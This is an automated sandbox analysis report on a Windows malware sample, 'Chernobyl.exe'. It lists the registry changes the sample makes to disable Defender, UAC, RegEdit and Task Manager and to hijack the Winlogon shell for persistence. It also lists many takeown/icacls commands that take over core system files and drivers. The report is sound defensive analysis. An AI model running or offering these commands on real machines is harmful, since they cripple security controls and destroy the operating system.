Analysis
max time kernel: 134s
max time network: 121s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 03-03-2024 01:22
Static task: static1
Behavioral task: behavioral1
Sample: Chernobyl.exe
Resource: win7-20240221-en
General
Target: Chernobyl.exe
Size: 414KB
MD5: 9fcd5730958fe25770695b809a353182
SHA1: 645ee1c9459e1b5572e773fdcce99ce44ab7d540
SHA256: 82f000040ba55e62efbf264a966a5e47bf92a23f0b52c214c1336d64103024ff
SHA512: 3e07a63effed4b68a9e7bd7289cc3b37ee1fda924e91a76adf7101c18aa3b82e74edf248ec2c242f2496f83510fe0810aeeddbc2daec096d236d136711636ddc
SSDEEP: 6144:c/bVZZo02222222222222222222222222222222222222222222222222222222T:jtH0GOZzv4TatsNqaJx
Malware Config
Signatures
Contains code to disable Windows Defender 2 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource, yara_rule:
- behavioral1/memory/1664-0-0x000000013FC30000-0x000000013FC9C000-memory.dmp, disable_win_def
- behavioral1/memory/1664-2-0x000000001BD90000-0x000000001BE10000-memory.dmp, disable_win_def
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes: Chernobyl.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, cluttscape.exe" (process: Chernobyl.exe)
Processes: Chernobyl.exe
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (process: Chernobyl.exe)
Disables RegEdit via registry modification 1 IoCs
Processes: Chernobyl.exe
- Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" (process: Chernobyl.exe)
Disables Task Manager via registry modification
Possible privilege escalation attempt 64 IoCs
Modifies file permissions 1 TTPs 64 IoCs
Modifies system executable filetype association 2 TTPs 3 IoCs
Processes: Chernobyl.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" (process: Chernobyl.exe)
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon (process: Chernobyl.exe)
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" (process: Chernobyl.exe)
Processes: Chernobyl.exe
- Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (process: Chernobyl.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (process: Chernobyl.exe)
Modifies WinLogon 2 TTPs 2 IoCs
Processes: Chernobyl.exe
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoRestartShell = "0" (process: Chernobyl.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DisableCAD = "1" (process: Chernobyl.exe)
Drops file in System32 directory 2 IoCs
Processes: Chernobyl.exe
- File opened for modification C:\Windows\System32\kill.ico (process: Chernobyl.exe)
- File opened for modification C:\Windows\System32\wallpaper.jpg (process: Chernobyl.exe)
Drops file in Windows directory 2 IoCs
Processes: Chernobyl.exe
- File created C:\Windows\cluttscape.exe (process: Chernobyl.exe)
- File opened for modification C:\Windows\cluttscape.exe (process: Chernobyl.exe)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Modifies File Icons 3 IoCs
Processes: Chernobyl.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons (process: Chernobyl.exe)
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\3 = "C:\\Windows\\System32\\kill.ico" (process: Chernobyl.exe)
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\4 = "C:\\Windows\\System32\\kill.ico" (process: Chernobyl.exe)
Modifies registry class 39 IoCs
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes: Chernobyl.exe
- pid 1664, process Chernobyl.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
System policy modification 1 TTPs 3 IoCs
Processes: Chernobyl.exe
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" (process: Chernobyl.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\UseDefaultTile = "1" (process: Chernobyl.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (process: Chernobyl.exe)
Processes
C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe
"C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"
PID:1664
- Modifies WinLogon for persistence
- UAC bypass
- Disables RegEdit via registry modification
- Modifies system executable filetype association
- Checks whether UAC is enabled
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies File Icons
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
  PID:2680
  - Suspicious use of WriteProcessMemory
    C:\Windows\system32\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    PID:2040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:804 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1204
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2736
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:664
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2864
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2932
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:436
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:940
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1548
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1288
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2996
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2908
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:320
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3040
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1708
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2808
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2592
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1700
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1580
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2432
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1920
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2716
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3064
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2876
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2704
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2516
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2404
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\smss.exe && icacls C:\Windows\System32\smss.exe /grant "%username%:F" && exit2⤵PID:668
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\smss.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\smss.exe /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\csrss.exe && icacls C:\Windows\System32\csrss.exe /grant "%username%:F" && exit2⤵PID:1660
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\csrss.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:900
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\csrss.exe /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:1060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\wininit.exe && icacls C:\Windows\System32\wininit.exe /grant "%username%:F" && exit2⤵PID:2076
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\wininit.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2496
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\wininit.exe /grant "Admin:F"3⤵PID:860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant "%username%:F" && exit2⤵PID:2264
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\LogonUI.exe /grant "Admin:F"3⤵PID:2820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\lsass.exe && icacls C:\Windows\System32\lsass.exe /grant "%username%:F" && exit2⤵PID:1476
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\lsass.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\lsass.exe /grant "Admin:F"3⤵PID:1956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\services.exe && icacls C:\Windows\System32\services.exe /grant "%username%:F" && exit2⤵PID:2124
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\services.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2128
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\services.exe /grant "Admin:F"3⤵PID:2780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winlogon.exe && icacls C:\Windows\System32\winlogon.exe /grant "%username%:F" && exit2⤵PID:1504
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\winlogon.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:820
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\winlogon.exe /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:2412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.efi && icacls C:\Windows\System32\winload.efi /grant "%username%:F" && exit2⤵PID:2660
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\winload.efi3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2360
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\winload.efi /grant "Admin:F"3⤵
- Modifies file permissions
PID:1192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.exe && icacls C:\Windows\System32\winload.exe /grant "%username%:F" && exit2⤵PID:2344
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\winload.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1216
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\winload.exe /grant "Admin:F"3⤵PID:816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\ntoskrnl.exe && icacls C:\Windows\System32\ntoskrnl.exe /grant "%username%:F" && exit2⤵PID:2624
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\ntoskrnl.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\ntoskrnl.exe /grant "Admin:F"3⤵
- Modifies file permissions
PID:3012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\svchost.exe && icacls C:\Windows\System32\svchost.exe /grant "%username%:F" && exit2⤵PID:572
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\svchost.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1088
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\svchost.exe /grant "Admin:F"3⤵PID:2108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\smss.exe && icacls C:\Windows\SysWOW64\smss.exe /grant "%username%:F" && exit2⤵PID:644
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\smss.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\csrss.exe && icacls C:\Windows\SysWOW64\csrss.exe /grant "%username%:F" && exit2⤵PID:2916
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\csrss.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\wininit.exe && icacls C:\Windows\SysWOW64\wininit.exe /grant "%username%:F" && exit2⤵PID:1764
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\wininit.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3048
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\SysWOW64\wininit.exe /grant "Admin:F"3⤵PID:2444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\LogonUI.exe && icacls C:\Windows\SysWOW64\LogonUI.exe /grant "%username%:F" && exit2⤵PID:2768
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\LogonUI.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\lsass.exe && icacls C:\Windows\SysWOW64\lsass.exe /grant "%username%:F" && exit2⤵PID:1520
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\lsass.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\services.exe && icacls C:\Windows\SysWOW64\services.exe /grant "%username%:F" && exit2⤵PID:1868
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\services.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winlogon.exe && icacls C:\Windows\SysWOW64\winlogon.exe /grant "%username%:F" && exit2⤵PID:876
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\winlogon.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winload.efi && icacls C:\Windows\SysWOW64\winload.efi /grant "%username%:F" && exit2⤵PID:2912
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\winload.efi3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winload.exe && icacls C:\Windows\SysWOW64\winload.exe /grant "%username%:F" && exit2⤵PID:2988
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\winload.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\ntoskrnl.exe && icacls C:\Windows\SysWOW64\ntoskrnl.exe /grant "%username%:F" && exit2⤵PID:2360
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\ntoskrnl.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2884
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\SysWOW64\ntoskrnl.exe /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:1412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\svchost.exe && icacls C:\Windows\SysWOW64\svchost.exe /grant "%username%:F" && exit2⤵PID:1776
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\svchost.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:816
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\SysWOW64\svchost.exe /grant "Admin:F"3⤵PID:2328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\1394bus.sys && icacls C:\Windows\System32\drivers\1394bus.sys /grant "%username%:F" && exit2⤵PID:2024
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\1394bus.sys3⤵PID:2664
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\1394bus.sys /grant "Admin:F"3⤵PID:1788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\1394ohci.sys && icacls C:\Windows\System32\drivers\1394ohci.sys /grant "%username%:F" && exit2⤵PID:2892
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\1394ohci.sys3⤵PID:1308
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\1394ohci.sys /grant "Admin:F"3⤵PID:2760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpi.sys && icacls C:\Windows\System32\drivers\acpi.sys /grant "%username%:F" && exit2⤵PID:1828
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\acpi.sys3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2168
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\acpi.sys /grant "Admin:F"3⤵PID:2472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpipmi.sys && icacls C:\Windows\System32\drivers\acpipmi.sys /grant "%username%:F" && exit2⤵PID:2520
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\acpipmi.sys3⤵PID:1952
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\acpipmi.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adp94xx.sys && icacls C:\Windows\System32\drivers\adp94xx.sys /grant "%username%:F" && exit2⤵PID:2340
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\adp94xx.sys3⤵PID:1060
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\adp94xx.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:2376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adpahci.sys && icacls C:\Windows\System32\drivers\adpahci.sys /grant "%username%:F" && exit2⤵PID:1604
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\adpahci.sys3⤵PID:2180
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\adpahci.sys /grant "Admin:F"3⤵PID:2568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adpu320.sys && icacls C:\Windows\System32\drivers\adpu320.sys /grant "%username%:F" && exit2⤵PID:1412
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\adpu320.sys3⤵
- Possible privilege escalation attempt
